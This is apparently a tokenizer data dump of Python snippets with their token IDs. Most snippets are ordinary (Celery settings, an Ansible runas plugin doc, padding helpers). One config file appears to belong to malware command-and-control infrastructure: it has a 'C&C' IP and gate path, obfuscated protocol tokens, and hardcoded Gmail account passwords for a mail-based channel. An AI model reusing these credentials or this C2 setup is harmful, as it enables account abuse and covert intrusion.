''' meanSub = data - np.mean(data) maxVal = np.max(np.abs(meanSub)) maxInd = np.argmax(np.abs(meanSub)) for i, v in reversed(list(enumerate(meanSub))): if v > percent * maxVal: minInd = i break return data[maxInd:minInd]
[ 2, 48443, 14629, 14, 8800, 14, 24330, 14, 21015, 198, 198, 11748, 28686, 198, 6738, 10688, 1330, 31028, 198, 198, 11748, 299, 32152, 355, 45941, 198, 6738, 299, 32152, 1330, 17266, 198, 6738, 629, 541, 88, 13, 40085, 1096, 1330, 1551, ...
2.293565
6,806
import time import warnings import matplotlib.pyplot as plt import numpy as np import sympy as sp from .global_qbx import global_qbx_self from .mesh import apply_interp_mat, gauss_rule, panelize_symbolic_surface, upsample # prep step 2: find the minimum distance at which integrals are computed # to the required tolerance
[ 11748, 640, 198, 11748, 14601, 198, 198, 11748, 2603, 29487, 8019, 13, 9078, 29487, 355, 458, 83, 198, 11748, 299, 32152, 355, 45941, 198, 11748, 10558, 88, 355, 599, 198, 198, 6738, 764, 20541, 62, 80, 65, 87, 1330, 3298, 62, 80, 6...
3.267327
101
# -*- coding: utf-8 -*- BROKER_URL = 'amqp://guest@localhost//' CELERY_ACCEPT_CONTENT = ['json'], CELERY_RESULT_BACKEND = 'amqp://guest@localhost//' CELERY_RESULT_SERIALIZER = 'json' CELERY_TASK_SERIALIZER = 'json' CELERY_TIMEZONE = 'Asia/Shanghai' CELERY_ENABLE_UTC = False
[ 2, 532, 9, 12, 19617, 25, 3384, 69, 12, 23, 532, 9, 12, 198, 198, 11473, 11380, 1137, 62, 21886, 796, 705, 321, 80, 79, 1378, 5162, 395, 31, 36750, 1003, 6, 198, 198, 34, 3698, 19664, 62, 2246, 42006, 62, 37815, 3525, 796, 37250...
2.114504
131
import logging as log
[ 11748, 18931, 355, 2604, 628 ]
4.6
5
import aspose.email from aspose.email.clients.imap import ImapClient from aspose.email.clients import SecurityOptions from aspose.email.clients.imap import ImapQueryBuilder import datetime as dt if __name__ == '__main__': run()
[ 11748, 355, 3455, 13, 12888, 198, 6738, 355, 3455, 13, 12888, 13, 565, 2334, 13, 320, 499, 1330, 1846, 499, 11792, 198, 6738, 355, 3455, 13, 12888, 13, 565, 2334, 1330, 4765, 29046, 198, 6738, 355, 3455, 13, 12888, 13, 565, 2334, 13...
3.065789
76
# Server UID SERVER_UID = 45158729 # Setup Logging system ######################################### # import os from FileConsoleLogger import FileConsoleLogger ServerLogger = FileConsoleLogger( os.path.join(os.path.dirname(os.path.abspath(__file__)), "_w3server.log") ) W3Logger = FileConsoleLogger( os.path.join(os.path.dirname(os.path.abspath(__file__)), "_w3.log") ) # # Setup Level 2 Protocol - P2Scheme ######################################### # from P2Scheme import P2Scheme P2_URL_TOKEN = '760e25f9eb3124'.decode('hex') P2_SUBJECT_TOKEN = '\x55\xaa\x63\x68\x69\x6e\x61' P2_DATA_TOKEN = '\x55\xaa\x63\x68\x69\x6e\x61' # P2_DATA_TOKEN = 'd85a8c54fbe5e6'.decode('hex') MARK = 'itwm=' B64_JUNK_LEN = 9 BIN_JUNK_LEN = 4 P2_Scheme = P2Scheme(_url_token=P2_URL_TOKEN, _data_token=P2_DATA_TOKEN, _mark=MARK, _subj_token=P2_SUBJECT_TOKEN,\ _b64junk_len=B64_JUNK_LEN, _binary_junk_len=BIN_JUNK_LEN) # # Setup Level 3 Protocol - P3Scheme ######################################### # from P3Scheme import P3Scheme # P3_PRIVATE_TOKEN = 'a20e25f9aa3fe4'.decode('hex') P3_SERVICE_TOKEN = '015a1354acf1b1'.decode('hex') # P3_Scheme = P3Scheme(private_token=P3_PRIVATE_TOKEN, service_token=P3_SERVICE_TOKEN) # # Setup HTTP checker # #from HTTPHeadersChecker import HTTPHeadersChecker # #HTTPChecker = HTTPHeadersChecker() # Setup LocalStorage # from FSLocalStorage import FSLocalStorage LocalStorage = FSLocalStorage() ############################################################ # Initialize Server instance # # #from W3Server import W3Server #MAIN_HANDLER = W3Server(p2_scheme=P2_Scheme, p3_scheme=P3_Scheme, http_checker=HTTPChecker, local_storage=LocalStorage, logger=ServerLogger) ############################################################ # Mail Parameters POP3_MAIL_IP = 'pop.gmail.com' POP3_PORT = 995 POP3_ADDR = 'jassnovember30@gmail.com' POP3_PASS = '30Jass11' SMTP_MAIL_IP = 'smtp.gmail.com' SMTP_PORT = 587 SMTP_TO_ADDR = 'userdf783@mailtransition.com' SMTP_FROM_ADDR = 'ginabetz75@gmail.com' SMTP_PASS = '75Gina75' # C&C Parametrs # XAS_IP = '104.152.187.66' XAS_GATE = '/updates/' ############################################################ # Setup P3 communication # wsgi2 # LS_TIMEOUT = 1 # big loop timeout FILES_PER_ITER = 5 # count of requests per iter ############################################################
[ 2, 9652, 25105, 198, 35009, 5959, 62, 27586, 796, 4153, 1314, 5774, 1959, 198, 198, 2, 31122, 5972, 2667, 1080, 1303, 29113, 7804, 198, 2, 198, 11748, 28686, 198, 6738, 9220, 47581, 11187, 1362, 1330, 9220, 47581, 11187, 1362, 198, 198,...
2.497886
946
from regression_tests import *
[ 6738, 20683, 62, 41989, 1330, 1635, 628, 628, 628, 628, 628, 628, 628, 198 ]
3.214286
14
import subprocess
[ 11748, 850, 14681 ]
5.666667
3
# -*- coding: utf-8 -*- # Copyright: (c) 2018, Ansible Project # GNU General Public License v3.0+ (see COPYING or https://www.gnu.org/licenses/gpl-3.0.txt) from __future__ import (absolute_import, division, print_function) __metaclass__ = type DOCUMENTATION = """ become: runas short_description: Run As user description: - This become plugins allows your remote/login user to execute commands as another user via the windows runas facility. author: ansible (@core) version_added: "2.8" options: become_user: description: User you 'become' to execute the task ini: - section: privilege_escalation key: become_user - section: runas_become_plugin key: user vars: - name: ansible_become_user - name: ansible_runas_user env: - name: ANSIBLE_BECOME_USER - name: ANSIBLE_RUNAS_USER required: True become_flags: description: Options to pass to runas, a space delimited list of k=v pairs default: '' ini: - section: privilege_escalation key: become_flags - section: runas_become_plugin key: flags vars: - name: ansible_become_flags - name: ansible_runas_flags env: - name: ANSIBLE_BECOME_FLAGS - name: ANSIBLE_RUNAS_FLAGS become_pass: description: password ini: - section: runas_become_plugin key: password vars: - name: ansible_become_password - name: ansible_become_pass - name: ansible_runas_runas env: - name: ANSIBLE_BECOME_PASS - name: ANSIBLE_RUNAS_PASS notes: - runas is really implemented in the powershell module handler and as such can only be used with winrm connections. - This plugin ignores the 'become_exe' setting as it uses an API and not an executable. """ from ansible.plugins.become import BecomeBase
[ 2, 532, 9, 12, 19617, 25, 3384, 69, 12, 23, 532, 9, 12, 198, 2, 15069, 25, 357, 66, 8, 2864, 11, 28038, 856, 4935, 198, 2, 22961, 3611, 5094, 13789, 410, 18, 13, 15, 10, 357, 3826, 27975, 45761, 393, 3740, 1378, 2503, 13, 4179...
2.045709
1,072
#!/usr/bin/env python # -*- coding: utf-8 -*- ''' ~Gros ''' from hashlib import sha256 import random def add_padding(data, block_size=16): """add PKCS#7 padding""" size = block_size - (len(data)%block_size) return data+chr(size)*size def strip_padding(data, block_size=16): """strip PKCS#7 padding""" padding = ord(data[-1]) if padding == 0 or padding > block_size or data[-padding:] != chr(padding)*padding: raise Exception("Invalid padding") return data[:-padding]
[ 2, 48443, 14629, 14, 8800, 14, 24330, 21015, 198, 2, 532, 9, 12, 19617, 25, 3384, 69, 12, 23, 532, 9, 12, 198, 198, 7061, 6, 198, 93, 38, 4951, 198, 7061, 6, 198, 198, 6738, 12234, 8019, 1330, 427, 64, 11645, 198, 11748, 4738, ...
2.575758
198
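A minimal sketch, added only for orientation, of how one of these records could be reproduced. Each record above pairs a source string with a list of token IDs, a characters-per-token ratio, and a token count. The IDs resemble GPT-2 BPE vocabulary entries (198 for a newline, 220 for a lone space token), so the sketch assumes a GPT-2 tokenizer; the dump itself does not name the tokenizer, so that choice and the sample string are assumptions, not facts taken from the data.

# Sketch: recompute one record's derived fields, assuming a GPT-2 BPE tokenizer.
from transformers import GPT2TokenizerFast

tokenizer = GPT2TokenizerFast.from_pretrained("gpt2")

# Hypothetical sample mirroring the short OpenCV row above.
content = "import cv2\nprint cv2.__version__ \n"

input_ids = tokenizer(content)["input_ids"]        # list of BPE token IDs
token_count = len(input_ids)                       # number of tokens
ratio_char_token = len(content) / token_count      # characters per token

print(input_ids, ratio_char_token, token_count)

If the tokenizer assumption holds, the printed values should land near the ones shown for the OpenCV row above (15 tokens, a ratio of roughly 2.27); a mismatch would simply mean a different tokenizer or text normalization was used when the dump was built.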